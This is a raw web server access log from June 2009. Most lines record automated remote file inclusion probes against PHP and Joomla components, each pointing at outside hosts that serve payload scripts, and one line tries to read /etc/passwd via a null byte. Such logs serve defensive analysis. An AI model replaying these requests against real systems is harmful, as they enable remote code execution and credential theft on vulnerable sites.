222.239.227.229 - - [20/Jun/2009:05:31:16 -0400] "GET /logs/access_log.Q109053100///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
66.249.71.14 - - [20/Jun/2009:05:31:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488ED2F2003AEF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.239.227.229 - - [20/Jun/2009:05:32:02 -0400] "GET /logs/access_log.Q109053100///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/pid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
74.55.29.146 - - [20/Jun/2009:05:32:17 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:05:32:22 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:32:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479C721600541F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [20/Jun/2009:05:33:01 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:05:33:16 -0400] "GET /logs/access_log.Q109061300//?path%5Bdocroot%5D=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:33:38 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:33:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:05:33:59 -0400] "GET //contrib/yabbse/poc.php?poc_root_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:33:59 -0400] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:34:17 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:34:17 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:34:17 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:34:17 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:34:30 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:34:35 -0400] "GET /logs/access_log.Q109052000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:34:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B824F83826200F96F04V+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.49.175.157 - - [20/Jun/2009:05:34:53 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:04 -0400] "GET /logs/access_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:35:09 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:14 -0400] "GET /logs/access_log.Q109060900//contrib/yabbse/poc.php?poc_root_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:19 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:19 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:19 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:35:30 -0400] "GET /logs/access_log.Q109050800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:35:49 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:05:36:07 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:36:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96820500CEEF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [20/Jun/2009:05:36:23 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:36:23 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/index.php?basepath=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:39 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:39 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:39 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:36:40 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:36:40 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:36:40 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:36:40 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:41 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:41 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.46.177.182 - - [20/Jun/2009:05:36:41 -0400] "GET /logs/access_log.Q109052900//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
61.250.85.185 - - [20/Jun/2009:05:36:43 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd%00 HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
83.103.72.226 - - [20/Jun/2009:05:37:02 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:37:02 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:37:02 -0400] "GET /logs/access_log.Q109052300%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:37:13 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:37:13 -0400] "GET /logs/access_log.Q109052300%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:37:13 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:05:38:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B82479CE2B600571F071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.207.160.102 - - [20/Jun/2009:05:38:08 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:38:08 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:38:08 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [20/Jun/2009:05:38:14 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.207.160.102 - - [20/Jun/2009:05:38:25 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:38:27 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 255 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:38:27 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 228 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:38:27 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 233 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:38:28 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:38:28 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:05:38:28 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
58.227.193.198 - - [20/Jun/2009:05:38:30 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:38:35 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:38:35 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:38:35 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:05:38:35 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 255 "-" "Mozilla/4.61 [en] (OS/2; U)"
85.17.162.28 - - [20/Jun/2009:05:38:36 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.230.22.39 - - [20/Jun/2009:05:38:41 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:38:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [20/Jun/2009:05:40:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488EF212003FEF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.230.22.39 - - [20/Jun/2009:05:41:25 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:05:41:30 -0400] "GET /logs/access_log.Q109060300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
91.121.156.60 - - [20/Jun/2009:05:42:21 -0400] "GET /logs/access_log.Q109010700//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:05:42:21 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:05:42:21 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:05:42:34 -0400] "GET /logs/access_log.Q109052300//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
66.249.71.54 - - [20/Jun/2009:05:42:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L209B81488E52020036EF04U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.226 - - [20/Jun/2009:05:42:48 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:42:54 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:42:55 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:05:42:55 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:43:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.156.60 - - [20/Jun/2009:05:44:26 -0400] "GET /logs/access_log.Q109010700%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
66.249.71.54 - - [20/Jun/2009:05:45:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A97024500C1EF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [20/Jun/2009:05:45:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8C42A2004A0F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:05:45:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1C22D100326E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [20/Jun/2009:05:46:05 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4B96F2F8007AEF011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.149.157.130 - - [20/Jun/2009:05:46:06 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:46:06 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:46:06 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:46:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1BD29100326E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [20/Jun/2009:05:47:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8BA23200450F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:05:47:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8C226200460F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.149.157.130 - - [20/Jun/2009:05:48:03 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:05:48:38 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:05:48:39 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:05:48:39 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:05:48:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [20/Jun/2009:05:48:54 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:48:54 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:48:54 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:05:49:01 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:49:12 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:49:30 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:05:49:46 -0400] "GET /images/over-index18_syring.jpg HTTP/1.1" 200 1627 "-" "Googlebot-Image/1.0"
66.249.71.14 - - [20/Jun/2009:05:49:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4B9742E8007FEF011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [20/Jun/2009:05:49:59 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:49:59 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:49:59 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:05:50:03 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109A9B4D8C42A2004A0F041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [20/Jun/2009:05:50:09 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:50:09 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:50:10 -0400] "GET /logs/access_log.Q109053100//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:50:25 -0400] "GET /logs/access_log.Q109051200//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:05:50:30 -0400] "GET /logs/access_log.Q109061400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.103.72.130 - - [20/Jun/2009:05:50:41 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.203.180.144 - - [20/Jun/2009:05:51:49 -0400] "GET /logs/access_log.Q109053100//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.203.180.144 - - [20/Jun/2009:05:51:49 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 6247 "-" "Mozilla/5.0"
211.203.180.144 - - [20/Jun/2009:05:51:49 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:05:51:53 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
